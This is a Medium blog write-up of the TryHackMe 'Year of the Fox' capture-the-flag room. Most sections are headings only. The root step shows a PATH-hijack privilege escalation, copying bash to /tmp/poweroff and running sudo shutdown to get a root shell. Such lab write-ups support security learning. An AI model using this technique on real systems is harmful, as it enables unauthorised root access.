Year of the Fox — TryHackMe

Enumeration

Web Enumeration:

Enumerate Username:

Brute Force Web Login

Reverse Shell

Catch Reverse Shell on Kali:

Web Flag:

User Privilege Escalation

Running chisel on kali:

Running chisel on target:

Root Privilege Escalation

cp /bin/bash /tmp/poweroff
fox@year-of-the-fox:/tmp$ echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games
fox@year-of-the-fox:/tmp$ PATH=/tmp:$PATH
fox@year-of-the-fox:/tmp$ echo $PATH
/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games
fox@year-of-the-fox:/tmp$ sudo /usr/sbin/shutdown
root@year-of-the-fox:/tmp# id
uid=0(root) gid=0(root) groups=0(root)
root@year-of-the-fox:/tmp# cat /root/root.txt
Not here - go find!

--

--

--

Software Developer having keen interest in Security, Privacy and Pen-testing. Certs:- Security+,PenTest+,AZ900

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

What is: hard link and soft link in Linux?

DDoS Resilient Reference Architecture on AW

Comparison of various HTTP Client APIs provided by Akka

AWS Snapshots and Backups

IMPORTANT ANNOUNCEMENT

Top 5 Free Alternatives to Windows!

Implementing (Elementary) Abstract Data Types In Python

Top 10 GitHub Repositories in May 2019 in English

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
0xsanz

0xsanz

Software Developer having keen interest in Security, Privacy and Pen-testing. Certs:- Security+,PenTest+,AZ900

More from Medium

How to protect from Spring4Shell

[EN] TryHackMe 25 Days of Cyber Security: Day 22 Walkthrough

TryHackMe: [Day 19] Blue Teaming Something Phishy Is Going On

Weekly Blog Post